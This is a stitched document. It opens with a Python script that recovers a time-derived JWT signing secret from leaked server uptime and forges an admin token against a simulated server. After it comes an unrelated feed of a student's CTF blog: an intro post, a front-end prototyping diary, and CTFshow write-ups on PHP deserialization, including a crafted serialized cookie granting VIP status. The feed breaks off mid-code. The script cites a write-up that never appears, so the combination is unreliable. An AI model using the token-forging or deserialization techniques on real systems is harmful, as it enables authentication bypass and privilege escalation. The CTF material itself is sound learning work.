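```python
"""Recover a time-derived HS256 JWT secret from a leaked uptime, then forge
an admin token. Editor-added example; the server side is simulated inline.

Assumptions (taken from the exploit script in the write-up, not from the
cut-off app source): APP_SECRET = sha256(str(time_started)).hexdigest(),
tokens are HS256, and every invalid-token response leaks
round(now - time_started) seconds of uptime.
"""
import base64
import hashlib
import hmac
import json
import time


def b64url(data: bytes) -> str:
    """JWT segments are base64url without '=' padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_encode(payload: dict, secret: str) -> str:
    """Equivalent of jwt.encode(payload, secret, algorithm='HS256')."""
    header = {"alg": "HS256", "typ": "JWT"}
    segments = [
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def hs256_verify(token: str, secret: str):
    """Return the payload if the HS256 signature is valid under secret, else None.
    The alg field is pinned: a token must never choose its own algorithm."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head, body, sig = parts
    try:
        if json.loads(b64url_decode(head)).get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), (head + "." + body).encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(body))
    except (ValueError, TypeError, AttributeError):
        return None


def secret_from_start_time(time_started: int) -> str:
    """The challenge's key derivation as the exploit script assumes it."""
    return hashlib.sha256(str(time_started).encode()).hexdigest()


def recover_secret(uptime: int, now: int, issued_token: str, window: int = 2):
    """Try start times around now - uptime and confirm each candidate against
    a token the server itself signed (the guest cookie set on first visit).
    Only the real secret verifies it, so the window can be as wide as clock
    skew requires without any blind guessing."""
    base = now - uptime
    for offset in range(-window, window + 1):
        candidate = secret_from_start_time(base + offset)
        if hs256_verify(issued_token, candidate) is not None:
            return candidate
    return None


def simulate():
    """Constructed scenario: the server started 1234 s ago, the attacker
    reads the uptime off the 401 page and already holds the guest cookie."""
    time_started = int(time.time()) - 1234
    app_secret = secret_from_start_time(time_started)                      # server side
    guest_cookie = hs256_encode({"id": 2, "role": "guest", "name": "guest"}, app_secret)
    uptime = round(time.time() - time_started)                              # the leaked value
    recovered = recover_secret(uptime, int(time.time()), guest_cookie)
    forged = hs256_encode({"id": 1, "role": "admin", "name": "Administrator"}, recovered)
    return app_secret, recovered, forged


if __name__ == "__main__":
    real, found, token = simulate()
    print("secret recovered:", found == real)
    print("forged admin token:", token)
```

With PyJWT installed, the confirmation step is jwt.decode(guest_cookie, candidate, algorithms=['HS256']) inside a try/except jwt.InvalidTokenError. hs256_verify pins the algorithm for the same reason PyJWT makes you pass algorithms= explicitly: a token must never decide how it is verified.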
<entry>
<title>本站第一条博客(置顶)</title>
<link href="/2025/11/23/First%20post/"/>
<url>/2025/11/23/First%20post/</url>
<content type="html"><![CDATA[<h1 id="关于本博客"><a href="#关于本博客" class="headerlink" title="关于本博客"></a>About this blog</h1><h2 id="本博客建立的目的"><a href="#本博客建立的目的" class="headerlink" title="本博客建立的目的"></a>Why this blog was set up</h2><p>This blog was set up to record my own (Fisssssh's) learning and exchanges in CTF, literature, philosophy and other areas, posting updates here so I can learn together with masters from all over the country. So please bear with any non-professional terms or expressions that appear on the blog. Also, I did not just start learning these things now; because of the date the blog was created, I will add related content later as appropriate, so please look forward to it (laughs)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231454.jpg"></p><h2 id="关于Fisssssh"><a href="#关于Fisssssh" class="headerlink" title="关于Fisssssh"></a>About Fisssssh</h2><p>My ID is Fisssssh (five s's). I am a newly minted CTFer from the class of 2025 at Taiyuan University of Technology, currently learning in UKY, a sub-team of UKFC (hoping to make the main team in the future), mainly working on web, and I hope to learn and improve together with my teammates and the masters I have yet to meet.</p><p>I arrived at Taiyuan University of Technology on 4 September 2025. Facing a new university life, I hope I can meet the challenges ahead with the most positive attitude, and I am full of anticipation for new opportunities. Whatever I see and hear from now on, I will post to my blog as soon as I can; I hope we can all help each other and learn together<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231629.jpg"></p><h2 id="关于我的ID"><a href="#关于我的ID" class="headerlink" title="关于我的ID"></a>About my ID</h2><p>My original ID was 咸鱼体验 (not sure whether anyone has seen me around before); the new one comes from tweaking "fish", the English for 咸鱼, and the meaning is naturally 咸鱼翻身, the salted fish flipping over (laughs)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231523.jpg"></p><h2 id="关于本人的爱好"><a href="#关于本人的爱好" class="headerlink" title="关于本人的爱好"></a>About my hobbies</h2><p>I am actually a Touhou fan (车万), though not on the games side; I just like the IP, so I would be glad to get to know more Touhou people~</p><p>Game-wise I like playing MC; I can play Delta Force and Valorant, but only to the point of being able to play at all (truth is, I cannot handle FPS games). I like indie games, so if you know a fun one, do not be stingy, recommend it to me (laughs)<br><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/20251123231524.jpg"><br>baka to anchor the post</p>]]></content>
</entry>
<entry>
<title>前端开发日记</title>
<link href="/2025/01/29/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E6%97%A5%E8%AE%B0/"/>
<url>/2025/01/29/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91%E6%97%A5%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="AI-前端学习笔记"><a href="#AI-前端学习笔记" class="headerlink" title="AI+前端学习笔记"></a>AI + front-end study notes</h1><h1 id="1-28"><a href="#1-28" class="headerlink" title="1.28"></a>1.28</h1><p>Project link: <a href="https://modao.cc/proto/E4SLDLz6t9kg9lALFTnBc0/sharing?view_mode=read_only">https://modao.cc/proto/E4SLDLz6t9kg9lALFTnBc0/sharing?view_mode=read_only</a> #Untitled prototype 3 - share</p><p>Mainly learned the basics of Modao (墨刀) and used it to build the interface of a video-playback site</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192128534.png" alt="image-20260128192128534"></p><p>It is split into four sections: Home, Following, Member Shop (会员购) and Mine</p><h3 id="1-首页"><a href="#1-首页" class="headerlink" title="1.首页"></a>1. Home</h3><p>The header has an avatar, a search box and a settings icon</p><p>Below that is a carousel; videos can be paged up and down freely</p><p>A navigation bar was added at the bottom of the page to move to the other pages</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192548649.png" alt="image-20260128192548649"></p><h3 id="2-关注"><a href="#2-关注" class="headerlink" title="2.关注"></a>2. Following</h3><p>The following list scrolls, and the feed (动态) page scrolls</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192534994.png" alt="image-20260128192534994"></p><h3 id="3-会员购"><a href="#3-会员购" class="headerlink" title="3.会员购"></a>3. Member Shop</h3><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192619323.png" alt="image-20260128192619323"></p><h3 id="3-我的页面"><a href="#3-我的页面" class="headerlink" title="3.我的页面"></a>4. Mine</h3><p>Supports editing profile information and uploading an avatar file</p><p><img src="C:\Users\18636\AppData\Roaming\Typora\typora-user-images\image-20260128192558802.png" alt="image-20260128192558802"></p><p>After clicking Save, an "Updated" toast is shown and the app returns to the page</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260128192737321.png" alt="image-20260128192737321"></p>]]></content>
</entry>
<entry>
<title>UKFC日志(持续更新)</title>
<link href="/2025/01/29/UKFC%E6%97%A5%E5%BF%97/"/>
<url>/2025/01/29/UKFC%E6%97%A5%E5%BF%97/</url>
<content type="html"><![CDATA[<h1 id="第12-29–1-4周"><a href="#第12-29–1-4周" class="headerlink" title="第12.29–1.4周"></a>Week of 12.29–1.4</h1><p>This week I practised deserialization in depth and picked up a lot of bypass tricks; I also went through almost every PHP magic method properly and filled in knowledge I had been missing. The practice range is still CTFshow.</p><p>First, the magic-method summary I lifted from a master's blog ()</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">__construct()</span><br><span class="line">Class constructor</span><br><span class="line">__destruct()</span><br><span class="line">Class destructor</span><br><span class="line">__call()</span><br><span class="line">Called when invoking an inaccessible method on an object</span><br><span class="line">__callStatic()</span><br><span class="line">Called when invoking an inaccessible method in a static context</span><br><span class="line">__get()</span><br><span class="line">Called when reading a member variable of the class (an inaccessible or undefined one)</span><br><span class="line">__set()</span><br><span class="line">Called when assigning to a member variable of the class (an inaccessible or undefined one)</span><br><span class="line">__isset()</span><br><span class="line">Called when isset() or empty() is used on an inaccessible property</span><br><span class="line">__unset()</span><br><span class="line">Called when unset() is used on an inaccessible property</span><br><span class="line">__sleep()</span><br><span class="line">Called first when serialize() runs</span><br><span class="line">__wakeup()</span><br><span class="line">Called first when unserialize() runs</span><br><span class="line">__toString()</span><br><span class="line">Called when the object is treated as a string</span><br><span class="line">__invoke()</span><br><span class="line">Called when an object is invoked the way a function is</span><br><span class="line">__set_state()</span><br><span class="line">This static method is called when var_export() exports the class</span><br><span class="line">__clone()</span><br><span class="line">Called once the object copy has completed</span><br><span class="line">__autoload()</span><br><span class="line">Attempts to load an undefined class (removed in PHP 8.0; use spl_autoload_register())</span><br><span class="line">__debugInfo()</span><br><span class="line">Supplies the information var_dump() prints for debugging</span><br></pre></td></tr></table></figure><p>The serialized form also differs with the access modifier (public, protected, private):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">public: the property name is serialized unchanged</span><br><span class="line">protected: the property name becomes %00*%00name (a NUL byte on each side of the asterisk)</span><br><span class="line">private: the property name becomes %00ClassName%00name</span><br><span class="line">the s:N length prefix counts those NUL bytes: a protected $password serializes as s:11:"%00*%00password" (%00 being the URL-encoded NUL byte)</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">1. __get, __set</span><br><span class="line">These two methods are designed for properties that are not declared in the class or its parents.</span><br><span class="line">__get( $property ) is called when reading an undefined property</span><br><span class="line">__set( $property, $value ) is called when assigning to an undefined property</span><br><span class="line">"Undefined" here includes properties whose visibility is protected or private (i.e. properties the calling scope has no access to)</span><br><span class="line">2. __isset, __unset</span><br><span class="line">__isset( $property ) is called when isset() is used on an undefined property</span><br><span class="line">__unset( $property ) is called when unset() is used on an undefined property</span><br><span class="line">As with __get and __set, "undefined" includes protected and private properties that are inaccessible from the calling scope</span><br><span class="line">3. __call</span><br><span class="line">__call( $method, $arg_array )</span><br><span class="line">Called when invoking an undefined (including inaccessible) method</span><br><span class="line">4. __autoload</span><br><span class="line">The __autoload function was called automatically when an undefined class was used, giving the engine one last chance to load the class before failing. It has been deprecated since PHP 7.2 and was removed in PHP 8.0; use spl_autoload_register() instead.</span><br><span class="line"></span><br><span class="line">Note: an exception thrown inside __autoload could not be caught by a catch block and caused a fatal error.</span><br><span class="line">5. __construct, __destruct</span><br><span class="line">__construct is the constructor, called when an object is created. Its advantage is a single name regardless of the class name, so renaming the class does not mean renaming the constructor. __destruct is the destructor; PHP calls it just before the object is destroyed (i.e. removed from memory). By default PHP only frees the memory held by the object's properties and releases the resources tied to the object; the destructor lets you run arbitrary cleanup code after an object has been used. It runs when PHP decides the script no longer refers to the object: inside a function's scope that happens on return, for globals it happens at the end of the script, and to destroy an object explicitly you assign any other value to the variable pointing at it, usually NULL, or call unset.</span><br><span class="line">6. __clone</span><br><span class="line">Since PHP 5 an object variable holds a handle, so assigning an object does not copy it; copying with the clone keyword invokes the __clone magic method automatically, so any initialization the copy needs can be done in __clone.</span><br><span class="line">7. __toString</span><br><span class="line">__toString is called automatically when an object is converted to a string, for example when echo prints the object. If the class does not implement it, the object cannot be printed with echo; instead you get: Catchable fatal error: Object of class test could not be converted to string in ... This method must return a string.</span><br><span class="line">Before PHP 5.2.0 __toString only took effect in combination with echo() or print(); from PHP 5.2.0 it works in any string context (for example printf() with the %s specifier) but not in non-string contexts (such as the %d specifier). From PHP 5.2.0, converting an object that has no __toString to a string raises an E_RECOVERABLE_ERROR.</span><br><span class="line">8. __sleep, __wakeup</span><br><span class="line">__sleep is used when serializing</span><br><span class="line">__wakeup is called when unserializing</span><br><span class="line">serialize() checks whether the class has a function with the magic name __sleep. If so, that function runs before any serialization. It can clean up the object and should return an array with the names of all the object's variables that should be serialized.</span><br><span class="line">The purpose of __sleep is to close any database connections the object may hold, commit pending data, or do similar cleanup. It is also useful for very large objects that do not need to be stored in full.</span><br><span class="line">Conversely, unserialize() checks for a function with the magic name __wakeup. If present, it can rebuild any resources the object may have. The purpose of __wakeup is to re-establish database connections lost during serialization and to handle other re-initialization tasks.</span><br><span class="line">9. __set_state</span><br><span class="line">This static method is called when var_export() is invoked (since PHP 5.1.0). Its only parameter is an array containing the class properties in the form array('property' => value, ...).</span><br><span class="line">10. __invoke</span><br><span class="line">When an object is called as if it were a function, __invoke is called automatically. Available from PHP 5.3.0.</span><br><span class="line">11. __callStatic</span><br><span class="line">It works like the __call() magic method but handles static method calls. Available from PHP 5.3.0; PHP tightened the definition of __callStatic(): it must be public and must be declared static. Likewise __call() must be public, as must all other magic methods.</span><br></pre></td></tr></table></figure><h1 id="web254"><a href="#web254" class="headerlink" title="web254"></a>web254</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- 
coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable 
language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>){</span><br><span class="line"><span class="variable language_">$this</span>->isVip=<span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span 
class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>This one has nothing to do with deserialization: just pass username=xxxxxx&password=xxxxxx. Walking through it anyway: the code first instantiates ctfShowUser with new, then passes username and password into the class's login method. If they equal the values stored in the class, isVip is set to true, so checkVip() returns true and vipOneKeyGetFlag() prints the flag.</p><h1 id="web255"><a href="#web255" class="headerlink" title="web255"></a>web255</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span 
class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkVip</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->isVip;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span 
class="title">vipOneKeyGetFlag</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->isVip){</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"your flag is "</span>.<span class="variable">$flag</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip, no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]); </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"> <span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span 
class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Compared with the previous challenge, this one adds a deserialization step: $user = unserialize($_COOKIE['user']);</p><p>Also, login no longer contains $this->isVip=true; so our goal is to find another way to make isVip true.</p><p>Notice that $user is supplied by us through COOKIE['user'], which means that value is deserialized. This is the vulnerability: pass a serialized string through the cookie so that, after deserialization, isVip=true.</p><p>Create a new PHP file to produce the serialized string:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span> = <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span 
class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O:11:"ctfShowUser":3:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxx</span><br><span class="line">x";s:5:"isVip";b:1;}</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104223844832.png" alt="image-20260104223844832"></p><h1 id="web256"><a href="#web256" class="headerlink" title="web256"></a>web256</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 19:29:02</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span 
